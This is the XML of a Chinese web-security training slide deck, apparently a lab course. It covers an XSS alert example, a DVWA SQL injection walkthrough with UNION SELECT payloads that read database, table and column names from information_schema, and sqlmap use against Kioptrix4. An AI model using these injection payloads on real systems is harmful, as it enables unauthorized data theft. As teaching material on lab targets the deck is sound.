                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss’) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，这里我们构造的的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> src=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>肯定显示错误，所以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="798098687" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2539365" y="779780"/>
            <a:ext cx="6786880" cy="3324225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1350196723" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516505" y="4402455"/>
            <a:ext cx="6927850" cy="1605280"/>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0" y="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63" name="文本框 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2670810" y="2752407"/>
            <a:ext cx="6994525" cy="1353185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="8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谢谢您的聆听</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="82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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="7545070" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：</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DVWA-sql</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注入</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high</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级别</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-793750" y="964565"/>
            <a:ext cx="6189345" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="28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注入点检测</a:t>
            </a:r>
            <a:endParaRPr sz="28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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="图片 100"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect b="8913"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="687705" y="1621790"/>
            <a:ext cx="7620000" cy="3964940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102" name="图片 101"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect b="5316"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5646420" y="555625"/>
            <a:ext cx="5219700" cy="5429250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="136525" y="5984875"/>
            <a:ext cx="7245350" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr sz="28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字符型注入，需要闭合，闭合字符为 ' </a:t>
            </a:r>
            <a:endParaRPr sz="28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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12"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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="7545070" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：</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DVWA-sql</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注入</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high</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级别</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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-793750" y="964565"/>
            <a:ext cx="6189345" cy="521970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="28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字段判断</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="28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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="图片 102"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect b="6912"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284480" y="1358265"/>
            <a:ext cx="6619875" cy="3856990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="图片 103"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect b="11288"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4114800" y="1876425"/>
            <a:ext cx="6058535" cy="386270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ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="1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4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="7545070" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：</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DVWA-sql</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注入</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high</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级别</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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-793750" y="964565"/>
            <a:ext cx="12335510" cy="3415030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>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获取数据库名</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ctr"/>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 UNION SELECT 1,database() from information_schema.schemata#</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ctr"/>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获取表名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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s</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ctr"/>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 UNION SELECT 1,table_name from information_schema.tables where table_schema='dvwa'#</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ctr"/>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获取列名</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ctr"/>
            <a:r>
              <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rPr>
              <a:t>' UNION SELECT 1,column_name from information_schema.columns where table_schema='dvwa' and table_name='users'#</a:t>
            </a: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a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" sz="24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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000"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810" y="-6350"/>
            <a:ext cx="12195175" cy="6870700"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19205" cy="10820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="图片 20" descr="蓝色科技背景-资源 2@2x"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1">
              <a:alphaModFix amt="70000"/>
            </a:blip>
            <a:srcRect t="48471" r="45228"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="11631" y="0"/>
              <a:ext cx="7569" cy="7112"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="图片 21" descr="蓝色科技背景-资源 2@2x"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId1">
              <a:alphaModFix amt="40000"/>
            </a:blip>
            <a:srcRect l="43174" b="51549"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4392"/>
              <a:ext cx="7525" cy="6408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="55" name="图片 54" descr="矢量智能对象2-2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="10840"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="7008" cy="10800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="图片 55" descr="矢量智能对象2"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect r="13206"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="10998" y="0"/>
              <a:ext cx="8202" cy="10800"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="组合 56"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="0" y="20"/>
              <a:ext cx="7260" cy="10800"/>
              <a:chOff x="0" y="20"/>
              <a:chExt cx="7260" cy="10800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="49" name="图片 48" descr="矢量智能对象"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="20"/>
                <a:ext cx="7260" cy="10800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="27" name="图片 26" descr="蓝色科技背景-资源 3@2x"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1089" y="1237"/>
                <a:ext cx="4007" cy="307"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="40" name="图片 39" descr="蓝色科技背景-资源 3@2x"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="885" y="5571"/>
                <a:ext cx="2623" cy="201"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="58" name="组合 57"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="11940" y="0"/>
              <a:ext cx="7260" cy="10800"/>
              <a:chOff x="0" y="20"/>
              <a:chExt cx="7260" cy="10800"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="59" name="图片 58" descr="矢量智能对象"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="20"/>
                <a:ext cx="7260" cy="10800"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="60" name="图片 59" descr="蓝色科技背景-资源 3@2x"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="1627" y="2597"/>
                <a:ext cx="4007" cy="307"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="图片 60" descr="蓝色科技背景-资源 3@2x"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm flipH="1">
                <a:off x="885" y="5571"/>
                <a:ext cx="2623" cy="201"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="矩形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7" y="10"/>
              <a:ext cx="19199" cy="10799"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill flip="none">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="010E2E"/>
                </a:gs>
                <a:gs pos="90000">
                  <a:srgbClr val="02174E">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Medium" panose="020B0600000000000000" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="346075" y="229870"/>
            <a:ext cx="9901555" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ct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实战：kioptrix4</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 level2 sqlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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ap</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t>自动注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent1">
                      <a:lumMod val="5000"/>
                      <a:lumOff val="95000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="019FE1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
              <a:effectLst>
                <a:outerShdw blurRad="25400" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="70000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="YouSheBiaoTiHei" panose="00000500000000000000" charset="-122"/>
              <a:ea typeface="YouSheBiaoTiHei" panose="00000500000000000000" charset="-122"/>
              <a:cs typeface="思源黑体 Medium" panose="020B0600000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="754380" y="974090"/>
            <a:ext cx="7670165" cy="3707130"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3463925" y="1748155"/>
            <a:ext cx="7543800" cy="4817745"/>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AS_NET" val="8.0.12"/>
  <p:tag name="AS_OS" val="Microsoft Windows NT 10.0.20348.0"/>
  <p:tag name="AS_RELEASE_DATE" val="2025.01.14"/>
  <p:tag name="AS_TITLE" val="Aspose.Slides for .NET6"/>
  <p:tag name="AS_VERSION" val="25.1"/>
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMzcyODMxYTE0ZTc0ZGU3Y2QwODc3MzYzN2Q1YmNiM2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Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="Arial"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Hans" typeface="思源黑体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Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="Arial"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Hans" typeface="思源黑体 Medium"/>
        <a:font script="Hant" typeface="新細明體"/>
        <a:font script="Arab" typeface="思源黑体 Medium"/>
        <a:font script="Hebr" typeface="思源黑体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思源黑体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Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="Arial"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Hans" typeface="思源黑体 Medium"/>
        <a:font script="Hant" typeface="新細明體"/>
        <a:font script="Arab" typeface="思源黑体 Medium"/>
        <a:font script="Hebr" typeface="思源黑体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Medium"/>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思源黑体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Medium"/>
        <a:ea typeface="思源黑体 Medium"/>
        <a:cs typeface="Arial"/>
        <a:font script="Jpan" typeface="ＭＳ Ｐゴシック"/>
        <a:font script="Hang" typeface="맑은 고딕"/>
        <a:font script="Hans" typeface="思源黑体 Medium"/>
        <a:font script="Hant" typeface="新細明體"/>
        <a:font script="Arab" typeface="思源黑体 Medium"/>
        <a:font script="Hebr" typeface="思源黑体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Medium"/>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5212</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>345</Paragraphs>
  <Slides>51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Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>思源黑体 Medium</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>思源黑体 Medium</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>思源黑体 Bold</vt:lpstr>
      <vt:lpstr>YouSheBiaoTiHei</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial Unicode MS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穆意</cp:lastModifiedBy>
  <cp:revision>113</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-14T01:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-09T02:44:34Z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261DC866533B4C35B48AA05F0D1A704B</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-11.1.0.12165</vt:lpwstr>
  </property>
</Properties>
</file>